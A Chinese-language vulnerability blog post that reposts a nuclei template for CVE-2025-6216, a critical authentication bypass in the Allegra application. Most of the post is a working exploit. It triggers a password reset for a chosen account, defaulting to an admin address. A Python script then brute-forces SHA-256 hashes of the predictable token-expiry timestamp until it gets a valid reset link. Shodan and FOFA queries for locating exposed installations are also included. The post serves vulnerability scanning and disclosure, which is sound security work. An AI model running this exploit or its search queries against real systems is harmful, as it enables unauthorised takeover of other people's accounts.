Allegra Authentication Bypass via Predictable Password Reset Token

漏洞信息

漏洞名称: Allegra Authentication Bypass via Predictable Password Reset Token

漏洞编号:

  • CVE: CVE-2025-6216

漏洞类型: 权限绕过

漏洞等级: 严重

漏洞描述: Allegra是一款广泛使用的应用程序,主要用于企业级服务中,提供密码恢复等功能。由于其广泛的应用,该漏洞的影响范围较大。该漏洞存在于密码恢复机制中,具体表现为生成密码重置令牌时依赖可预测的值,导致攻击者可以绕过身份验证。这种漏洞的技术根源在于密码重置令牌的生成过程中缺乏足够的随机性,使得攻击者能够预测或重放令牌。由于无需身份验证即可利用此漏洞,攻击者可以轻松绕过身份验证机制,获取未授权的访问权限,进而可能泄露敏感数据或破坏系统完整性。此漏洞的严重性在于它允许远程攻击者无需任何前置条件即可利用,且利用过程可以自动化执行,对受影响系统的安全构成重大威胁。

产品厂商: alltena

产品名称: Allegra

影响版本: *

搜索语法: http.favicon.hash:”284403119”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/8e1558b13436acb7e082231f215ab37ea212e214/code%2Fcves%2F2025%2FCVE-2025-6216.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117

id: CVE-2025-6216

info:
  name: Allegra - Authentication Bypass via Predictable Password Reset Token
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Allegra calculateTokenExpDate Password Recovery Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of Allegra. Authentication is not required to exploit this vulnerability. The specific flaw exists within the password recovery mechanism. The issue results from reliance upon a predictable value when generating a password reset token. An attacker can leverage this vulnerability to bypass authentication on the application.
  impact: |
    An attacker can exploit this vulnerability to bypass authentication and gain unauthorized access to the application, potentially compromising sensitive data and system integrity.
  remediation: |
    Upgrade Allegra to version 8.1.4 or 7.5.2 or later to fix the predictable password reset token vulnerability.
  reference:
    - https://www.zerodayinitiative.com/advisories/ZDI-25-410/
    - https://alltena.com/en/resources/release-notes/release-notes-for-release-8-1-4-and-release-7-5-2
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6216
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 9.8
    cve-id: CVE-2025-6216
    cwe-id: CWE-640
    cpe: cpe:2.3:a:alltena:allegra:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: alltena
    product: allegra
    shodan-query: http.favicon.hash:"284403119"
    fofa-query: icon_hash="284403119"
  tags: cve,cve2025,allegra,auth-bypass,predictable-token,reset

variables:
  email: "admin@mydomainxxx.com"  # Change to a test account

flow: http(1) && code()

http:
  - raw:
      - |
        POST /resetPassword.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        email={{email}}&fromAjax=true&_dc=1750669432104&perspectiveType=&appActionID=

    extractors:
      - type: regex
        name: date_header
        part: header
        internal: true
        group: 1
        regex:
          - "Date: (.*)"

    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "emailSent"
          - '"success":true'
        condition: and

code:
  - engine:
      - py
      - python3 # requires python to be pre-installed on system running nuclei
    source: |
            import requests
            import hashlib,os
            import time
            from datetime import datetime, timezone
            from email.utils import parsedate_to_datetime

            def get_server_time(response):
                date_header = response.headers.get('Date')
                if date_header:
                    return parsedate_to_datetime(date_header)
                return None

            def main():
                BASE_URL = os.getenv("BaseURL")
                EMAIL = os.getenv("email")
                date_header = os.getenv("date_header")
                server_time = parsedate_to_datetime(date_header)
                if not server_time:
                    return
                server_time_ms = int(server_time.timestamp() * 1000)
                expiry_time_ms = server_time_ms + 28800000
                base_expiry_sec = (expiry_time_ms // 1000) * 1000
                for ms in range(1000):
                    candidate_expiry_ms = base_expiry_sec + ms
                    token = hashlib.sha256(str(candidate_expiry_ms).encode()).hexdigest()
                    test_url = f"{BASE_URL}/resetPassword!confirm.action?ctk={token}"
                    r = requests.get(test_url, allow_redirects=False)
                    if 'com.trackplus.app.logon.ResetPasswordApplication' in r.text:
                        print(test_url)
                        return

            if __name__ == "__main__":
                main()

    matchers:
      - type: dsl
        dsl:
          - contains(code_response, "/resetPassword!confirm.action?ctk=")

    extractors:
      - type: dsl  # type of the extractor
        dsl:
          - '"Reset URL: " + code_response'
# digest: 4b0a00483046022100d59748595f6cc13b789b45b1b70fa7456e85389d00ebade00416bc13322030ae022100fdc0a9151f91f606b9f69221833d79ca5cbe89c2eb8d1da315759fa149b5f350:f54de283b4eb358da492cc866d2be612


Github Poc
#projectdiscovery/nuclei-templates:github issues #权限绕过
Allegra Authentication Bypass via Predictable Password Reset Token
http://example.com/2025/07/12/github_3215977554/
作者
lianccc
发布于
2025年7月12日
许可协议